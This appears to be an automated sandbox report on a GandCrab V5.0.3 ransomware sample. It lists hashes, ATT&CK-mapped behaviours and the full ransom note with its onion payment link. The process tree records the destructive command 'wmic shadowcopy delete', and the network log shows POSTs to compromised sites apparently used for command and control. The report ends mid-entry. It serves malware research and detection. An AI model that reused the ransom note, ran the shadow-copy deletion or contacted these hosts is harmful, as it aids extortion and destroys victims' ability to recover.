gandcrab | 2eaccf2ffad0c83282b940b5ed1e65f38acacc9e002b48e3bf4f852e1097232a

Resubmissions

05/02/2025, 08:52 UTC

250205-ksw7wa1kap 10

15/03/2024, 21:38 UTC

240315-1hdksabg4x 10

Analysis

max time kernel
148s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
15/03/2024, 21:38 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ransomwares/GandCrab/GandCrab.exe
Size

424KB
MD5

95557a29de4b70a25ce62a03472be684
SHA1

5baabf2869278e60d4c4f236b832bffddd6cf969
SHA256

49b769536224f160b6087dc866edf6445531c6136ab76b9d5079ce622b043200
SHA512

79b78cf77926e0d8b424ad9984f72d4461c7d9e7af58c4e2af32fa7c58cc445c534228b0709b87f5e35e1c8793b3d028dc60787151d852b8524023d08b57f103
SSDEEP

6144:/UGV83D35bJrqV2L/E0tA+j16kUef5Nj1mB9WjEw0tzMV:qvmVe9h1qEtkBzw0tQ

Score

10^/10

gandcrab backdoor ransomware

Malware Config

Extracted

Path

C:\$Recycle.Bin\S-1-5-21-3270530367-132075249-2153716227-1000\XJUXCGPDEA-DECRYPT.txt

Ransom Note

---= GANDCRAB V5.0.3 =--- ***********************UNDER NO CIRCUMSTANCES DO NOT DELETE THIS FILE, UNTIL ALL YOUR DATA IS RECOVERED*********************** *****FAILING TO DO SO, WILL RESULT IN YOUR SYSTEM CORRUPTION, IF THERE WILL BE DECRYPTION ERRORS***** Attention! All your files, documents, photos, databases and other important files are encrypted and have the extension: .XJUXCGPDEA The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. The server with your key is in a closed network TOR. You can get there by the following ways: ---------------------------------------------------------------------------------------- | 0. Download Tor browser - https://www.torproject.org/ | 1. Install Tor browser | 2. Open Tor Browser | 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/86f7bad98bf1c24 | 4. Follow the instructions on this page ---------------------------------------------------------------------------------------- On our page you will see instructions on payment and get the opportunity to decrypt 1 file for free. ATTENTION! IN ORDER TO PREVENT DATA DAMAGE: * DO NOT MODIFY ENCRYPTED FILES * DO NOT CHANGE DATA BELOW ---BEGIN GANDCRAB KEY--- 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 ---END GANDCRAB KEY--- ---BEGIN PC DATA--- wfKD6iudumBkmpL8IRr4U4exEVaoOXLtwDwmOrT1y1YWvOiWMx5GYaRdvZZbToZRtnYb7nlWtbfPTGqHhh5qBJzzs9MC7736UkGSDDniUJJG8/LFF//kmGmoAZAGLo2j5/wd2UrxMJK+iqKhTkS3ArgAxrZOOOiXrbnhbWMkLHQnbYuWlMClYZxYU6SDxpopRo5r292AV1KIZBZV4APBuUHcKSIr2MWMI0O1MKIP2IpKLE2TS5wNmoQoAHZIP7k/TfrG1tVzlDb3jcZAB3gql9dnWN0lCD4xdg7bDNQrvH1xSi3FCw+6kfktKtizqdynr7r154JiurEmkUXB6OKi/zA2Fut0GopYOFqKBi/t/xGAEdgb8icQ4t24Laa5Y59yPYyu2Qiiy5RtTRYqBlPKJPYJzJFqwNcoBxPInKc+DO5cALafi2Eyg61rLg32xAxKww72ZinpCBFM3vDLNeaq1wMZNHQURkmKCjnb1ifgDX9lmT3f7CydQUtnnLIqlsiw73IGVY3pfjf3fBwceMB8P3BNg39XQ3DC2aZBEuHtLEi+BdBMOZH4HpsOeb/YRZoP4YksV8zuv7OczMv9OXYAh9gzrewdRb9tHf+DbmDW4OIcXpVeLdQr9FxhOVLL2u9gwWmeLQ4zxgtafmr5TWEPiWMEkrI= ---END PC DATA---

URLs

http://gandcrabmfe6mnef.onion/86f7bad98bf1c24

Signatures

Gandcrab
Gandcrab is a Trojan horse that encrypts files on a computer.
ransomware backdoor gandcrab
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490
Renames multiple (275) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
ransomware

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\XJUXCGPDEA-DECRYPT.txt	wermgr.exe
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\98bf1bc998bf1c2127.lock	wermgr.exe

Enumerates connected drives 3 TTPs 23 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\E:	wermgr.exe
File opened (read-only)	\??\I:	wermgr.exe
File opened (read-only)	\??\Q:	wermgr.exe
File opened (read-only)	\??\W:	wermgr.exe
File opened (read-only)	\??\U:	wermgr.exe
File opened (read-only)	\??\G:	wermgr.exe
File opened (read-only)	\??\J:	wermgr.exe
File opened (read-only)	\??\K:	wermgr.exe
File opened (read-only)	\??\S:	wermgr.exe
File opened (read-only)	\??\T:	wermgr.exe
File opened (read-only)	\??\X:	wermgr.exe
File opened (read-only)	\??\Y:	wermgr.exe
File opened (read-only)	\??\Z:	wermgr.exe
File opened (read-only)	\??\A:	wermgr.exe
File opened (read-only)	\??\H:	wermgr.exe
File opened (read-only)	\??\N:	wermgr.exe
File opened (read-only)	\??\P:	wermgr.exe
File opened (read-only)	\??\R:	wermgr.exe
File opened (read-only)	\??\V:	wermgr.exe
File opened (read-only)	\??\B:	wermgr.exe
File opened (read-only)	\??\L:	wermgr.exe
File opened (read-only)	\??\M:	wermgr.exe
File opened (read-only)	\??\O:	wermgr.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3270530367-132075249-2153716227-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\\\pidor.bmp"	wermgr.exe

Drops file in Program Files directory 37 IoCs

description	ioc	Process
File created	C:\Program Files\XJUXCGPDEA-DECRYPT.txt	wermgr.exe
File opened for modification	C:\Program Files\DisconnectUndo.asp	wermgr.exe
File opened for modification	C:\Program Files\DismountRegister.rmi	wermgr.exe
File opened for modification	C:\Program Files\PushResize.xht	wermgr.exe
File opened for modification	C:\Program Files\SearchJoin.mht	wermgr.exe
File opened for modification	C:\Program Files\WatchShow.xps	wermgr.exe
File created	C:\Program Files\98bf1bc998bf1c2127.lock	wermgr.exe
File opened for modification	C:\Program Files\BackupSet.vsdm	wermgr.exe
File opened for modification	C:\Program Files\EnterEnable.mpeg	wermgr.exe
File opened for modification	C:\Program Files\LockReset.wmf	wermgr.exe
File opened for modification	C:\Program Files\MountConfirm.vdx	wermgr.exe
File opened for modification	C:\Program Files\StopReset.ps1	wermgr.exe
File opened for modification	C:\Program Files\CompareUpdate.fon	wermgr.exe
File opened for modification	C:\Program Files\InitializeRead.mp2v	wermgr.exe
File opened for modification	C:\Program Files\MoveSet.mpv2	wermgr.exe
File opened for modification	C:\Program Files\ReceiveMount.M2V	wermgr.exe
File opened for modification	C:\Program Files\AssertMeasure.WTV	wermgr.exe
File opened for modification	C:\Program Files\StartUnpublish.wmf	wermgr.exe
File opened for modification	C:\Program Files\UnprotectReceive.pptx	wermgr.exe
File opened for modification	C:\Program Files\WatchClose.mhtml	wermgr.exe
File opened for modification	C:\Program Files\FindRedo.tif	wermgr.exe
File created	C:\Program Files (x86)\98bf1bc998bf1c2127.lock	wermgr.exe
File opened for modification	C:\Program Files\ConvertFromShow.midi	wermgr.exe
File opened for modification	C:\Program Files\GetStop.ini	wermgr.exe
File opened for modification	C:\Program Files\HideRevoke.tiff	wermgr.exe
File opened for modification	C:\Program Files\StepTest.mpeg	wermgr.exe
File opened for modification	C:\Program Files\UpdateEnter.ppt	wermgr.exe
File created	C:\Program Files (x86)\XJUXCGPDEA-DECRYPT.txt	wermgr.exe
File opened for modification	C:\Program Files\ConfirmFind.MTS	wermgr.exe
File opened for modification	C:\Program Files\CopyGroup.jpg	wermgr.exe
File opened for modification	C:\Program Files\GetInstall.ppsm	wermgr.exe
File opened for modification	C:\Program Files\ImportInstall.ttf	wermgr.exe
File opened for modification	C:\Program Files\ProtectShow.dotx	wermgr.exe
File opened for modification	C:\Program Files\RepairUnlock.asx	wermgr.exe
File opened for modification	C:\Program Files\UnlockProtect.wdp	wermgr.exe
File opened for modification	C:\Program Files\PublishSubmit.xls	wermgr.exe
File opened for modification	C:\Program Files\TraceUndo.ex_	wermgr.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
1564	wermgr.exe
1564	wermgr.exe
1564	wermgr.exe
1564	wermgr.exe

Suspicious use of AdjustPrivilegeToken 45 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	3764	wmic.exe
Token: SeSecurityPrivilege	3764	wmic.exe
Token: SeTakeOwnershipPrivilege	3764	wmic.exe
Token: SeLoadDriverPrivilege	3764	wmic.exe
Token: SeSystemProfilePrivilege	3764	wmic.exe
Token: SeSystemtimePrivilege	3764	wmic.exe
Token: SeProfSingleProcessPrivilege	3764	wmic.exe
Token: SeIncBasePriorityPrivilege	3764	wmic.exe
Token: SeCreatePagefilePrivilege	3764	wmic.exe
Token: SeBackupPrivilege	3764	wmic.exe
Token: SeRestorePrivilege	3764	wmic.exe
Token: SeShutdownPrivilege	3764	wmic.exe
Token: SeDebugPrivilege	3764	wmic.exe
Token: SeSystemEnvironmentPrivilege	3764	wmic.exe
Token: SeRemoteShutdownPrivilege	3764	wmic.exe
Token: SeUndockPrivilege	3764	wmic.exe
Token: SeManageVolumePrivilege	3764	wmic.exe
Token: 33	3764	wmic.exe
Token: 34	3764	wmic.exe
Token: 35	3764	wmic.exe
Token: 36	3764	wmic.exe
Token: SeIncreaseQuotaPrivilege	3764	wmic.exe
Token: SeSecurityPrivilege	3764	wmic.exe
Token: SeTakeOwnershipPrivilege	3764	wmic.exe
Token: SeLoadDriverPrivilege	3764	wmic.exe
Token: SeSystemProfilePrivilege	3764	wmic.exe
Token: SeSystemtimePrivilege	3764	wmic.exe
Token: SeProfSingleProcessPrivilege	3764	wmic.exe
Token: SeIncBasePriorityPrivilege	3764	wmic.exe
Token: SeCreatePagefilePrivilege	3764	wmic.exe
Token: SeBackupPrivilege	3764	wmic.exe
Token: SeRestorePrivilege	3764	wmic.exe
Token: SeShutdownPrivilege	3764	wmic.exe
Token: SeDebugPrivilege	3764	wmic.exe
Token: SeSystemEnvironmentPrivilege	3764	wmic.exe
Token: SeRemoteShutdownPrivilege	3764	wmic.exe
Token: SeUndockPrivilege	3764	wmic.exe
Token: SeManageVolumePrivilege	3764	wmic.exe
Token: 33	3764	wmic.exe
Token: 34	3764	wmic.exe
Token: 35	3764	wmic.exe
Token: 36	3764	wmic.exe
Token: SeBackupPrivilege	4820	vssvc.exe
Token: SeRestorePrivilege	4820	vssvc.exe
Token: SeAuditPrivilege	4820	vssvc.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2076 wrote to memory of 1564	2076	GandCrab.exe	92
PID 2076 wrote to memory of 1564	2076	GandCrab.exe	92
PID 2076 wrote to memory of 1564	2076	GandCrab.exe	92
PID 2076 wrote to memory of 1564	2076	GandCrab.exe	92
PID 2076 wrote to memory of 1564	2076	GandCrab.exe	92
PID 1564 wrote to memory of 3764	1564	wermgr.exe	101
PID 1564 wrote to memory of 3764	1564	wermgr.exe	101
PID 1564 wrote to memory of 3764	1564	wermgr.exe	101

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\ransomwares\GandCrab\GandCrab.exe
"C:\Users\Admin\AppData\Local\Temp\ransomwares\GandCrab\GandCrab.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2076
- C:\Windows\SysWOW64\wermgr.exe
  "C:\Windows\System32\wermgr.exe"
  2⤵
  - Drops startup file
  - Enumerates connected drives
  - Sets desktop wallpaper using registry
  - Drops file in Program Files directory
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\SysWOW64\wbem\wmic.exe
    "C:\Windows\system32\wbem\wmic.exe" shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3764

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4820

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\XJUXCGPDEA-DECRYPT.txt
1⤵
PID:1940

Network

DNS

67.31.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

67.31.126.40.in-addr.arpa

IN PTR

Response
DNS

161.53.26.217.in-addr.arpa

Remote address:

8.8.8.8:53

Request

161.53.26.217.in-addr.arpa

IN PTR

Response

161.53.26.217.in-addr.arpa

IN PTR

sl171web hostpointch
DNS

209.205.72.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

209.205.72.20.in-addr.arpa

IN PTR

Response
DNS

191.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

191.178.17.96.in-addr.arpa

IN PTR

Response

191.178.17.96.in-addr.arpa

IN PTR

a96-17-178-191deploystaticakamaitechnologiescom
DNS

241.154.82.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

241.154.82.20.in-addr.arpa

IN PTR

Response
DNS

43.58.199.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

43.58.199.20.in-addr.arpa

IN PTR

Response
DNS

86.23.85.13.in-addr.arpa

Remote address:

8.8.8.8:53

Request

86.23.85.13.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR

Response
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR
DNS

133.211.185.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

133.211.185.52.in-addr.arpa

IN PTR
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR

Response

41.110.16.96.in-addr.arpa

IN PTR

a96-16-110-41deploystaticakamaitechnologiescom
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR
DNS

41.110.16.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

41.110.16.96.in-addr.arpa

IN PTR
DNS

www.2mmotorsport.biz

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.2mmotorsport.biz

IN A

Response

www.2mmotorsport.biz

IN A

77.75.249.22
POST

https://www.2mmotorsport.biz/static/tmp/hederu.gif

wermgr.exe

Remote address:

77.75.249.22:443

Request

POST /static/tmp/hederu.gif HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.2mmotorsport.biz
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Fri, 15 Mar 2024 21:39:59 GMT
Server: Apache
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Link: <https://2mmotorsport.biz/wp-json/>; rel="https://api.w.org/"
Upgrade: h2
Connection: Upgrade
Vary: User-Agent
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
DNS

22.249.75.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

22.249.75.77.in-addr.arpa

IN PTR

Response

22.249.75.77.in-addr.arpa

IN PTR

cloud2-vm243 de-nserverde
DNS

15.164.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

15.164.165.52.in-addr.arpa

IN PTR

Response
DNS

40.13.222.173.in-addr.arpa

Remote address:

8.8.8.8:53

Request

40.13.222.173.in-addr.arpa

IN PTR

Response

40.13.222.173.in-addr.arpa

IN PTR

a173-222-13-40deploystaticakamaitechnologiescom
DNS

201.179.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

201.179.17.96.in-addr.arpa

IN PTR

Response

201.179.17.96.in-addr.arpa

IN PTR

a96-17-179-201deploystaticakamaitechnologiescom
DNS

www.haargenau.biz

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.haargenau.biz

IN A

Response

www.haargenau.biz

IN A

217.26.53.161
POST

https://www.haargenau.biz/wp-content/pictures/sokamethzu.png

wermgr.exe

Remote address:

217.26.53.161:443

Request

POST /wp-content/pictures/sokamethzu.png HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.haargenau.biz
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

Date: Fri, 15 Mar 2024 21:40:08 GMT
Server: Apache
Content-Length: 196
Content-Type: text/html; charset=iso-8859-1
DNS

195.177.78.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

195.177.78.104.in-addr.arpa

IN PTR

Response

195.177.78.104.in-addr.arpa

IN PTR

a104-78-177-195deploystaticakamaitechnologiescom
DNS

23.149.64.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

23.149.64.172.in-addr.arpa

IN PTR

Response
DNS

119.110.54.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

119.110.54.20.in-addr.arpa

IN PTR

Response
DNS

www.bizziniinfissi.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.bizziniinfissi.com

IN A

Response
DNS

www.holzbock.biz

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.holzbock.biz

IN A

Response

www.holzbock.biz

IN CNAME

holzbock.biz

holzbock.biz

IN A

94.126.20.68
POST

https://www.holzbock.biz/data/graphic/zumerumoka.jpg

wermgr.exe

Remote address:

94.126.20.68:443

Request

POST /data/graphic/zumerumoka.jpg HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.holzbock.biz
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 301 Moved Permanently

Date: Fri, 15 Mar 2024 21:40:10 GMT
Server: Apache
Location: https://www.schreiner-freiamt.ch/data/graphic/zumerumoka.jpg
Content-Length: 268
Content-Type: text/html; charset=iso-8859-1
DNS

233.38.18.104.in-addr.arpa

Remote address:

8.8.8.8:53

Request

233.38.18.104.in-addr.arpa

IN PTR

Response
DNS

68.20.126.94.in-addr.arpa

Remote address:

8.8.8.8:53

Request

68.20.126.94.in-addr.arpa

IN PTR

Response
DNS

www.schreiner-freiamt.ch

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.schreiner-freiamt.ch

IN A

Response

www.schreiner-freiamt.ch

IN CNAME

schreiner-freiamt.ch

schreiner-freiamt.ch

IN A

94.126.20.68
GET

https://www.schreiner-freiamt.ch/data/graphic/zumerumoka.jpg

wermgr.exe

Remote address:

94.126.20.68:443

Request

GET /data/graphic/zumerumoka.jpg HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Cache-Control: no-cache
Host: www.schreiner-freiamt.ch
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Fri, 15 Mar 2024 21:40:10 GMT
Server: Apache
X-Powered-By: PHP/7.4.33
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: cache
Cache-Control: max-age=31536000
Set-Cookie: PHPSESSID=2de670c88618cc157e96b0068ac8dabb; path=/
ETag: d13382e87cded78e6d8a7c438bd47021b1b8fc45
Last-Modified: Thu, 23 Dec 2010 01:51:22 GMT
Access-Control-Allow-Origin: https://verwaltung.web-agentur.ch
Access-Control-Allow-Credentials: true
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
DNS

www.fliptray.biz

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.fliptray.biz

IN A

Response
DNS

www.pizcam.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.pizcam.com

IN A

Response

www.pizcam.com

IN A

195.15.227.239
POST

https://www.pizcam.com/uploads/tmp/imthkeru.jpg

wermgr.exe

Remote address:

195.15.227.239:443

Request

POST /uploads/tmp/imthkeru.jpg HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.pizcam.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

date: Fri, 15 Mar 2024 21:40:12 GMT
server: Apache
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://www.pizcam.com/wp-json/>; rel="https://api.w.org/"
strict-transport-security: max-age=16000000
upgrade: h2
connection: Upgrade
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
DNS

239.227.15.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.227.15.195.in-addr.arpa

IN PTR

Response

239.227.15.195.in-addr.arpa

IN PTR

od-203b10ch2 infomaniakch
DNS

239.227.15.195.in-addr.arpa

Remote address:

8.8.8.8:53

Request

239.227.15.195.in-addr.arpa

IN PTR
DNS

217.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

217.135.221.88.in-addr.arpa

IN PTR

Response

217.135.221.88.in-addr.arpa

IN PTR

a88-221-135-217deploystaticakamaitechnologiescom
DNS

www.swisswellness.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.swisswellness.com

IN A

Response

www.swisswellness.com

IN A

83.138.86.12
DNS

www.swisswellness.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.swisswellness.com

IN A
DNS

206.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

206.178.17.96.in-addr.arpa

IN PTR

Response

206.178.17.96.in-addr.arpa

IN PTR

a96-17-178-206deploystaticakamaitechnologiescom
DNS

www.hotelweisshorn.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hotelweisshorn.com

IN A

Response

www.hotelweisshorn.com

IN A

38.207.226.122
DNS

www.hotelweisshorn.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hotelweisshorn.com

IN A
DNS

83.135.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

83.135.221.88.in-addr.arpa

IN PTR

Response

83.135.221.88.in-addr.arpa

IN PTR

a88-221-135-83deploystaticakamaitechnologiescom
DNS

122.226.207.38.in-addr.arpa

Remote address:

8.8.8.8:53

Request

122.226.207.38.in-addr.arpa

IN PTR

Response
DNS

122.226.207.38.in-addr.arpa

Remote address:

8.8.8.8:53

Request

122.226.207.38.in-addr.arpa

IN PTR

Response
DNS

208.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.178.17.96.in-addr.arpa

IN PTR

Response

208.178.17.96.in-addr.arpa

IN PTR

a96-17-178-208deploystaticakamaitechnologiescom
DNS

208.178.17.96.in-addr.arpa

Remote address:

8.8.8.8:53

Request

208.178.17.96.in-addr.arpa

IN PTR
DNS

www.whitepod.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.whitepod.com

IN A

Response

www.whitepod.com

IN A

83.166.138.7
POST

https://www.whitepod.com/includes/pics/dazu.bmp

wermgr.exe

Remote address:

83.166.138.7:443

Request

POST /includes/pics/dazu.bmp HTTP/1.1
Content-Type: multipart/form-data
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: www.whitepod.com
Content-Length: 668
Cache-Control: no-cache

Response

HTTP/1.1 404 Not Found

date: Fri, 15 Mar 2024 21:40:48 GMT
server: Apache
expires: Wed, 11 Jan 1984 05:00:00 GMT
cache-control: no-cache, must-revalidate, max-age=0
link: <https://whitepod.com/wp-json/>; rel="https://api.w.org/"
strict-transport-security: max-age=16000000
upgrade: h2
connection: Upgrade
transfer-encoding: chunked
content-type: text/html; charset=UTF-8
DNS

7.138.166.83.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.138.166.83.in-addr.arpa

IN PTR

Response

7.138.166.83.in-addr.arpa

IN PTR

h2web61 infomaniakch
DNS

7.138.166.83.in-addr.arpa

Remote address:

8.8.8.8:53

Request

7.138.166.83.in-addr.arpa

IN PTR
DNS

26.35.223.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.35.223.20.in-addr.arpa

IN PTR

Response
DNS

www.hardrockhoteldavos.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hardrockhoteldavos.com

IN A

Response

www.hardrockhoteldavos.com

IN CNAME

redirector.hebsdigital.com

redirector.hebsdigital.com

IN A

18.207.88.16
DNS

www.hardrockhoteldavos.com

wermgr.exe

Remote address:

8.8.8.8:53

Request

www.hardrockhoteldavos.com

IN A
POST

